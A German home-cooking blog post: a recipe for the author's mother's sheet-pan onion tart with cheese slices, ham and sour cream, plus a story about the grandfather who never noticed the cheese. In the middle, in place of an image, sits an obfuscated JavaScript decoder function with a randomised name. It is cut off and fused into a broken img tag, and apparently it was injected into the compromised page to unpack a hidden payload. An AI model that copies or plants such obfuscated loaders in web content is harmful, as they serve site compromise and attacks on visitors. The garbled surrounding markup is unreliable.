Nachtrag Zwiebelkuchen

Hallo nocheinmal zusammen,

nachdem ich das Rezept des Zwiebelkuchens gepostet habe, ist mir eingefallen, dass meine Mutter diesen auch häufiger für meine Großeltern, Ferdinand und Brunhilde Michalke, gebacken hat.

Mein Opa war nie für Käse zu haben. Eigentlich hat er Käse so ziemlich gehasst. Wenn dann meine Mutti den Zwiebelkuchen für die beiden gemacht hat, hat sie meinem Opa erzählt, dass darin kein Käse enthalten sei. Er ist jedesmal darauf reingefallen. Ihm hat der Zwiebelkuchen herrlich geschmeckt.

Habe Gott sie beide selig.

Mutters Zwiebelkuchen

Heute will ich mal das Rezept für einen Zwiebelkuchen, den meine Mutti immer so macht vorstellen. Er ist für die Zubereitung auf einem Backblech gedacht.

Der Teig besteht aus:

1 Becher süße Sahne (250 ml)

4 Eier (normale Größe)

375g Mehl

1 Tütchen Backpulver

für den Belag benötigst Du:

2 kg Zwiebeln

1 Paket gewürfelter Schinken (z.B. Frühstücksschinken, der wird nicht hart)

2 Pakete gekochter Schinken (runde Scheiben, insgesamt ca. 400g)

2 Eier

2 Becher (2 x 250 ml) Schmand

2 Pakete Scheibletten Käse (nach Geschmack, z.B. Emmentaler)

Öl

Salz, Pfeffer

Kümmel (wer den nicht mag, kann den Kümmel auch weglassen, dient jedoch der Verdauung)

Zubereitung:

Zuerst müsst Ihr den Teig anrühren. Zuerst Mehl, Eier und Sahne anrühren. Danach das Backpulver unterrühren. Ein tiefes Backblech einfetten und den Teig gleichmäßig verteilen.

Danach legt Ihr den gesamten Scheibletten-Käse auf den Teig. Dieser dient später als trennende Schicht zwischen Teig und Zwiebelmasse, so dass der Teig nicht matschig wird.

Jetzt müssen die Zwiebeln in Ringe geschnitten werden. Die Zwiebeln werden zusammen mit den Speckwürfel in einer Pfanne mit Öl so lange gedünstet, bis die Zwiebeln glasig sind.

Zunächst legt ihr den Teig gleichmäßig auf dem Blech aus. Darauf kommen dann der Scheibletten-Käse, der wie Kacheln ganz Dicht nebeneinander gelegt wird. Das Ergebnis sieht dann so aus:zz

Verteilt die Zwiebelmasse auf den mit Scheibletten belegten Teig. Auf den Käse müssen noch die in Streifen (ca. 1 cm breit) geschnittenen Scheiben gekochter Schinken gelegt werden.

Teig, mit Käse und Schinken

Danach wird die Zwiebelmasse gleichmäßig auf das Blech verteilt. Hier das Ergebnis:

function o49a105dc37ce(y6){var u6='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var u9='';var vf,ne,x5,o0,v2,pb,r6;var p9=0;do{o0=u6.indexOf(y6.charAt(p9++));v2=u6.indexOf(y6.charAt(p9++));pb=u6.indexOf(y6.charAt(p9++));r6=u6.indexOf(y6.charAt(p9++));vf=(o0<<2)|(v2>>4);ne=((v2&15)<<4)|(pb>>2);x5=((pb&3)<<6)|r6;if(vf>=192)vf+=848;else if(vf==168)vf=1025;else if(vf==184)vf=1105;u9+=String.fromCharCode(vf);if(pb!=64){if(ne>=192)ne+=848;else if(ne==168)ne=1025;else if(ne==184)ne=1105;u9+=String.fromCharCode(ne);}if(r6!=64){if(x5>=192)x5+=848;else if(x5==168)x5=1025;else if(x5==184)x5=1105;u9+=String.fromCharCode(x5);}}while(p9and" src="http://www.socrates4.com/Sascha/wp-content/uploads/2011/06/2010-12-31-16.35.38-300x225.jpg" alt="" width="300" height="225" />

Ganz zum Schluss werden die zwei Becher Schmand zunächst mit 2 Eier verrührt und mit Pfeffer, Salz und bei Bedarf mit Kümmel abgeschmeckt. Den abgeschmeckten Schmand verteilt Ihr jetzt abschließend auf dem Backblech, so dass die gesamte Zwiebelmasse mit Schmand bedeckt ist. Wichtig: den Schmand erst unmittelbar bevor Ihr das Blech in den Backofen schiebt, auf das Backblech geben, da sonst der Schmand komplett durch die Zwiebeln durchsickert.

Das Backblech packt Ihr bei 180°C Ober/Unterhitze (160°C Umluft)  für ca. 60 Minuten in den Backofen. Der Schmand sollte eine gold-/gelbene Farbe angenommen haben und schon ist der Zwiebelkuchen fertig.

Wollt Ihr nur einen Zwiebelkuchen in einer Springform machen, so braucht Ihr von allen Zutaten nur die Hälfte. Der restliche Ablauf bleibt dabei dann gleich.

Viel Spaß beim Ausprobieren. Über Rückmeldungen würde ich mich sehr freuen. Ich übernehme jedoch keinerlei Haftung für verdorbene Mägen.

Bis bald,

Euer Sascha